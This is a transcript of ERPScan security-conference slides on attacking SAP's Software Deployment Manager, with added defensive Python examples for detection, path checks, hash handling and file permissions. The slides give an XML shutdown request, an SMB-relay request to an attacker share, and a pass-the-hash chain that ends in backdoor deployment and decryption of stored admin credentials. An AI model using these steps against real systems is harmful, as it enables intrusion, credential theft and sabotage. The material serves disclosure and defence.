Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server
TRANSCRIPT
![Page 1: Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server](https://reader034.vdocument.in/reader034/viewer/2022042702/55d6cf57bb61eb662b8b4798/html5/thumbnails/1.jpg)
Invest in security to secure investments
Injecting evil code in your SAP J2EE systems: Security of SAP Software Deployment Server
Dmitry Chastukhin, Director of SAP pentest/research team, ERPScan
About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
SAP
• The most popular business application
• More than 250000 customers worldwide
• 83% of Forbes 500 companies run SAP
• Main system: ERP
• 3 platforms:
  - NetWeaver ABAP
  - NetWeaver J2EE
  - BusinessObjects
SAP insecurity
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data
Fraud
• False transactions
• Modification of master data
Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations
SAP vulnerabilities
[Chart: number of SAP vulnerabilities per year, 2001 to 2014; more than 2800 in total. Source: SAP Security in Figures]
Is it remotely exploitable?
More than 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SAP Host Control, etc.
sapscan.com
What about other services?
[Chart comparing SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate and SAP Message Server httpd on a 0 to 9 scale. Source: SAP Security in Figures]
SAP Application servers
• SAP NetWeaver ABAP
• SAP NetWeaver J2EE
  - SAP Portal
  - SAP Solution Manager
  - SAP NetWeaver Development Infrastructure (NWDI)
• SAP BusinessObjects
• SAP HANA Extended Application Services
• SAP SUP
• SAP Fiori
SAP NetWeaver development infrastructure
• Design Time Repository (DTR)
• Component Build Service (CBS)
• Change Management Service (CMS)
• Software Landscape Directory (SLD) / NS
• Software Deployment Manager (SDM)
SAP NetWeaver development infrastructure
[Slides 10 to 15: diagrams of the SAP NetWeaver development infrastructure, no further text]
Software Deployment Manager
• Single interface for deployment
• Deploy apps (*.ear, *.war, *.sda)
• Implement custom patches
SDM server
• Different server modes:
  - standalone
  - integrated
• Only one user at a time
• Only hardcoded admin user
• Three ports:
  - 50017: Admin port
  - 50018: GUI port
  - 50019: HTTP port
SDM client
• Browsing the distribution of deployed components
• Deploying and undeploying
• Log viewing
SDM attack intro
• SAP infrastructure includes many Java services
• Almost all Java stuff uses UME
• Universal user with a password
• Only one user at a time
• Ability to deploy evil code => plus, see 1st item
SDM attack intro
• Thick client Java application (sad story)
• Scarce communication settings
• Difficult to intercept
• Custom protocols
SDM attack intro
• SAP has its own SAP Java Virtual Machine (JVM)
• Java 6 has the Attach API
• Attach to another running JVM
• Intercept and modify calls
Attack SAP SDM. DoS
• If an attacker uses an incorrect password 3 times, the server will shut down automatically
• Also, if you send this request, you can shut down the SDM server manually:
[10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest>
Attacking SAP SDM. SMB relay
Packet:
[10 spaces]<?xml version="1.0"?> <FileAccessRequest f="\\ip_addr\blabla"> </FileAccessRequest>
An old trick, but sometimes it's very useful
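The two framed XML requests on slides 22 and 23 (the ShutDownRequest and a FileAccessRequest pointing at a UNC share) are exactly what a network sensor in front of the SDM admin port should flag. The Python below is an added example, not code from the talk or from SAP: it rebuilds the length-prefixed framing the slides show (assumed here to be the decimal payload length right-justified in a 12-byte space-padded header, which reproduces the "[10 spaces]56" prefix of slide 22), checks that the declared length matches the payload, and classifies the request from the defender's side. All sample frames are constructed inline; the `build_frame`, `parse_frame`, `classify` and `scan` names are this example's own.

```python
import re
import xml.etree.ElementTree as ET

# Assumption (not stated on the slides): the header is the decimal payload length,
# right-justified in a 12-byte space-padded field. A 56-byte payload therefore
# produces the "[10 spaces]56" prefix shown on slide 22.
HEADER_LEN = 12

# UNC path: two leading backslashes, a host, then a backslash (slide 23: f="\\ip_addr\...").
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def build_frame(payload: str) -> bytes:
    """Wrap an XML payload in the assumed length-prefixed framing."""
    body = payload.encode("utf-8")
    return str(len(body)).rjust(HEADER_LEN).encode("ascii") + body


def parse_frame(data: bytes):
    """Return (payload, None), or (None, reason) when the framing is inconsistent."""
    header, body = data[:HEADER_LEN], data[HEADER_LEN:]
    try:
        declared = int(header.decode("ascii").strip())
    except ValueError:
        return None, "bad-header"
    if declared != len(body):
        return None, "length-mismatch"
    return body, None


def classify(data: bytes) -> dict:
    """Classify one captured frame: 'alert', 'info' or 'malformed'."""
    body, err = parse_frame(data)
    if err:
        return {"verdict": "malformed", "reason": err}
    try:
        # ElementTree does not fetch external entities, so parsing captured data is safe here.
        root = ET.fromstring(body)
    except ET.ParseError:
        return {"verdict": "malformed", "reason": "xml"}
    if root.tag == "ShutDownRequest":
        return {"verdict": "alert", "reason": "shutdown-request", "request": root.tag}
    if root.tag == "FileAccessRequest":
        path = root.get("f", "")
        if UNC_RE.match(path):
            # Server-side access to a remote UNC share is the SMB relay pattern of slide 23.
            return {"verdict": "alert", "reason": "unc-path", "request": root.tag, "path": path}
        return {"verdict": "info", "reason": "file-access", "request": root.tag, "path": path}
    return {"verdict": "info", "reason": "other", "request": root.tag}


def scan(frames) -> list:
    """Run classify() over captured frames and keep only alerts and malformed frames."""
    return [r for r in map(classify, frames) if r["verdict"] != "info"]


if __name__ == "__main__":
    # Constructed sample traffic, not a real capture.
    samples = [
        build_frame('<?xml version="1.0"?><ShutDownRequest></ShutDownRequest>'),
        build_frame(r'<?xml version="1.0"?><FileAccessRequest f="\\ip_addr\blabla"></FileAccessRequest>'),
        build_frame(r'<?xml version="1.0"?><FileAccessRequest f="D:\usr\sap\log\sdm.log"></FileAccessRequest>'),
        b"          99<a/>",
    ]
    for finding in scan(samples):
        print(finding)
```

The length check matters for detection as much as the tag match: a frame whose declared length disagrees with its body is either a protocol bug or someone probing the parser, and either deserves a log line before the server ever sees it.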
Prevention
• Install Note 1724516
• Enable the security features of SDM
• SDM server and SDM client need to be updated
https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
From Nobody to Administrator
Now, I will show an interesting attack:
Compromise some SAP services
Compromise SAP SDM
Compromise SAP server OS
Compromise SAP
SDM authentication abuse
• OK. Let's see how authentication in SDM works:
  - user enters password
  - hash is calculated locally on client
  - password hash is sent to server
  - hash is compared to hash from configuration file
Pass the hash attack here!
SDM authentication abuse
RootFrame.class
SDM authentication abuse
…\SDM\program\config\sdmrepository.sdc
SDM authentication abuse
SMDAuthenticatorImpl.class
Attack on SAP SDM
Read sdmrepository.sdc
Get password hash
Use hash as password to authenticate on SDM server
Deploy backdoor on SAP server
PROFIT!
File read
• OS command execution through CTC (Notes 1467771, 1445998)
• XML External Entities (Note 1619539)
• Directory Traversal (Note 1630293)
• Through MMC file read function (Notes 927637 and 1439348)
We have something new for you :)
SAP Log Viewer standalone
• Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket)
• You can:
  - View log on local server
  - View log on remote server
  - Register file as log file
Read log file without authentication!
SAP Log Viewer standalone
Attack is pretty easy:
Connect to LogViewer standalone server
Register sdmrepository.sdc file as log file
Read it
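The weakness on slides 32 and 33 is that "register file as log file" accepts any path, so a configuration file such as sdmrepository.sdc can be registered and read. The Python below is an added example, not the Log Viewer's code or anything from the talk: it is the check a log-registration endpoint should run before opening a file, resolving `..` segments and symlinks and confining the result to an allowlisted log directory with an allowlisted suffix. The `demo()` function builds a constructed temporary tree shaped like `…/SDM/program/{log,config}` and probes the check with a direct traversal and with a symlink planted inside the log directory; the directory layout, suffix list and function names are this example's assumptions.

```python
import os
import tempfile

# Assumption: only files with these suffixes may be registered as logs.
ALLOWED_SUFFIXES = (".log", ".trc")


class LogRegistrationError(ValueError):
    """Raised when a requested path may not be registered as a log file."""


def resolve_log_path(requested: str, allowed_roots) -> str:
    """Resolve `requested` and return its real path if it lies under an allowed root."""
    real = os.path.realpath(requested)  # collapses '..' and follows symlinks first
    for root in allowed_roots:
        root_real = os.path.realpath(root)
        if os.path.commonpath([real, root_real]) == root_real:
            if not real.lower().endswith(ALLOWED_SUFFIXES):
                raise LogRegistrationError("not a log file: %s" % real)
            return real
    raise LogRegistrationError("outside log directories: %s" % real)


def demo() -> dict:
    """Constructed tree shaped like SDM/program/{log,config}; returns the verdict per probe."""
    base = tempfile.mkdtemp(prefix="sdm-")
    logdir = os.path.join(base, "program", "log")
    cfgdir = os.path.join(base, "program", "config")
    os.makedirs(logdir)
    os.makedirs(cfgdir)
    good = os.path.join(logdir, "sdm.log")
    secret = os.path.join(cfgdir, "sdmrepository.sdc")  # the file slide 33 reads
    for path in (good, secret):
        open(path, "w").close()
    # A harmless-looking .log name inside the log dir that points at the config file.
    link = os.path.join(logdir, "innocent.log")
    os.symlink(secret, link)

    results = {"good": resolve_log_path(good, [logdir]) == os.path.realpath(good)}
    probes = {
        "traversal": os.path.join(logdir, "..", "config", "sdmrepository.sdc"),
        "symlink": link,
    }
    for name, path in probes.items():
        try:
            resolve_log_path(path, [logdir])
            results[name] = "accepted"
        except LogRegistrationError:
            results[name] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

Resolving the real path before the prefix comparison is the whole point: a plain string check on the requested path passes both probes, because `…/log/../config/sdmrepository.sdc` starts with the log directory and `innocent.log` ends in `.log`.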
SAP Log Viewer standalone
[Slide 34: image only]
SAP Log Viewer standalone
When we have a password hash, we can use it as a password to authenticate on the SDM server
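Slide 26 and the line above describe the same flaw from two ends: the client hashes the password, the server compares the transmitted hash with the hash stored in sdmrepository.sdc, so the stored hash is itself the credential and anyone who can read the file can log in. The Python below is an added example, not the talk's code or SAP's: it models that scheme next to a server-side salted PBKDF2 verifier, and shows that replaying the stored value authenticates against the first and fails against the second. SHA-1 stands in for whatever hash SDM really uses (an assumption), and the hardened variant assumes the password itself travels over a TLS-protected channel; `client_side_hash`, `vulnerable_verify`, `make_record` and `hardened_verify` are this example's names.

```python
import hashlib
import hmac
import os

# --- Scheme as described on the slides: client hashes, server compares hashes ---

def client_side_hash(password: str) -> str:
    """Assumption: unsalted SHA-1 stands in for the hash the SDM client computes."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def vulnerable_verify(value_from_client: str, stored_hash: str) -> bool:
    """Server compares what the client sent with the hash from its config file.

    Whoever reads the config file can send the stored value directly.
    """
    return hmac.compare_digest(value_from_client, stored_hash)


# --- Hardened: server-side salted PBKDF2, password sent over TLS (assumed) ---

def make_record(password: str, salt: bytes = None, iterations: int = 200_000) -> dict:
    """Create the stored verifier: random salt, iteration count, derived key."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": dk}


def hardened_verify(password: str, record: dict) -> bool:
    """Server re-derives from the plaintext password; the stored digest is not a credential."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             record["salt"], record["iterations"])
    return hmac.compare_digest(dk, record["hash"])


def demo() -> tuple:
    """Return (legit, replay) outcomes for both schemes with a constructed password."""
    password = "Secret123"  # constructed
    stored = client_side_hash(password)  # what the config file holds under the slide's scheme
    legit_old = vulnerable_verify(client_side_hash(password), stored)
    replay_old = vulnerable_verify(stored, stored)  # attacker read the file, replays the hash

    record = make_record(password)
    legit_new = hardened_verify(password, record)
    replay_new = hardened_verify(record["hash"].hex(), record)  # stored digest used as password
    return legit_old, replay_old, legit_new, replay_new


if __name__ == "__main__":
    print(demo())  # (True, True, True, False)
```

Client-side hashing only ever protects the plaintext, never the account: once the hash is what the server accepts, the hash is the password. Keeping the derivation on the server, with a per-record salt and a work factor, turns the stored value back into a verifier that cannot be replayed.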
SDM intrusion
Full info about the SDM repository
Bypassing SDM restrictions
• Observe all server directories
• Read arbitrary files via Log Viewer
SDM undeploying
Undeploy any application
SDM backdooring
Deploy any application
SDM backdooring
• before
• after
SDM post-exploitation
Prevention
• Install Notes 1724516, 1685106
• Enable the security features of SDM
• SDM server and SDM client need to be updated
https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
"The Software Deployment Manager (SDM) uses the database connection information, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as software deployment and undeployment."
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
Wow! J2EE Engine administrator user and password
Where is all this stuff located?
SAP SecStore
SAP SecStore
"By default, the J2EE Engine stores secure data in the file \usr\sap\<SID>\SYS\global\security\data\SecStore.properties in the file system."
"The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm."
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
OK. Let's try to read SecStore.properties
SAP SecStore
• We can execute any OS command (we have our backdoor)
• We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
• It's all that we need
SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
But where is the key?
Get the password
• We have an encrypted password
• We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
Prevention
Restrict read access to the files SecStore.properties and SecStore.key
http://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
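The prevention on this slide is a file-permission control, so the useful check is an audit that says whether SecStore.properties and SecStore.key are readable by anyone but their owner. The Python below is an added example, not SAP's tooling or anything from the talk: it inspects POSIX mode bits for both files in a data directory and returns the findings. It assumes SecStore.key sits beside SecStore.properties in the `…\SYS\global\security\data` directory named on slide 44 (the slides give only the .properties path), and `demo()` builds a constructed directory with a world-readable .properties next to a correctly locked-down key; on Windows hosts the same check would have to read the ACL instead of mode bits. `audit_file_mode`, `audit_secstore` and `SECSTORE_FILES` are this example's names.

```python
import os
import stat
import tempfile

# Files named on slide 48. Assumption: SecStore.key lives beside SecStore.properties
# in .../SYS/global/security/data (only the .properties path is given on the slides).
SECSTORE_FILES = ("SecStore.properties", "SecStore.key")


def audit_file_mode(path: str) -> list:
    """Return findings for one file; an empty list means owner-only access."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("readable by group/other (mode %o)" % mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group/other (mode %o)" % mode)
    return findings


def audit_secstore(data_dir: str) -> dict:
    """Audit both secure-store files under data_dir; a missing file is reported as such."""
    report = {}
    for name in SECSTORE_FILES:
        path = os.path.join(data_dir, name)
        report[name] = audit_file_mode(path) if os.path.exists(path) else ["missing"]
    return report


def demo() -> dict:
    """Constructed data directory: weak mode on .properties, corrected mode on the key."""
    data_dir = tempfile.mkdtemp(prefix="secstore-")
    props = os.path.join(data_dir, "SecStore.properties")
    key = os.path.join(data_dir, "SecStore.key")
    with open(props, "w") as f:
        f.write("$internal/mode=encrypted\n")  # constructed placeholder content
    with open(key, "w") as f:
        f.write("constructed-key-material\n")  # constructed placeholder content
    os.chmod(props, 0o644)  # the weak setting: every local account can read it
    os.chmod(key, 0o600)    # the corrected setting: owner only
    return audit_secstore(data_dir)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or ["ok"])
```

Both files need the same treatment: the encrypted properties file is worthless without the key, and the key is worthless without the file, so a finding on either one is a finding on the whole secure store.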
Post-exploitation
SDM hacking demo
SAP Guides
It's all in your hands:
Regular security assessments
ABAP code review
Monitoring technical security
Segregation of Duties
Security events monitoring
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
web: www.erpscan.com
e-mail: [email protected], [email protected]